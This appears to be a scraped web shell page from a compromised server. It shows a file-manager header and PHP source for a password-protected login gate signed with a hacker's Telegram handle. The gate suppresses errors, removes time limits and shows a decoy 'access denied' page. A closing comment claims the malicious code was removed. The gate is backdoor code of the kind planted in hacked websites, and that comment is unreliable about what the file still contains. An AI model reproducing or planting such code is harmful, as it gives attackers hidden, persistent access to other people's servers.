/
tmp
/
New Directory
Upload File
HOME
<?php /**Hunter Neel:https://t.me/hunter_neel**/ $password = '4122cb13c7a474c1976c9706ae36521d'; error_reporting(0); set_time_limit(0); session_start(); if (!isset($_SESSION['loggedIn'])) { $_SESSION['loggedIn'] = false; } if (isset($_POST['password'])) { if (md5($_POST['password']) == $password) { $_SESSION['loggedIn'] = true; } } if (!$_SESSION['loggedIn']): ?> <!DOCTYPE html> <html> <head> <title>off</title> <style> /* CSS for input box */ input[type=password] { background-color: black; /* Black background */ border: 2px solid #000000; /* Gray60 border */ color: red; /* Red text color */ padding: 5px; /* Padding for better appearance */ font-family: 'Trebuchet MS', sans-serif; /* Font family */ font-size: 13px; /* Font size */ } /* CSS for button */ input[type=submit] { color: #000000; /* Black color for text */ background-color: black; /* Black background */ border-color: transparent; /* Transparent border color */ } /* CSS for centering content */ .content { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); } </style> </head> <body style="background-color: black;"> <div class="content"> <img src="https://media2.giphy.com/media/v1.Y2lkPTc5MGI3NjExbjgzdnNpMHY2eXF6aTExbnNmNjIwYXV2cmJpa3Fpd2Z1OWNrN245aSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/bjC8sdurIYfElHXfxR/giphy.gif" height="390" width="500"/> <p><font face="courier" size="5" color="red"> Admin: </font><font face="courier" size="5" color="silver"> You can't access this page. </font></p> </div> <p align="center"> <center> <form method="post"> <input type="password" name="password"> <input type="submit" name="submit" value="admin"> </form> </body> </html> <?php exit(); endif; ?> <?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ ?>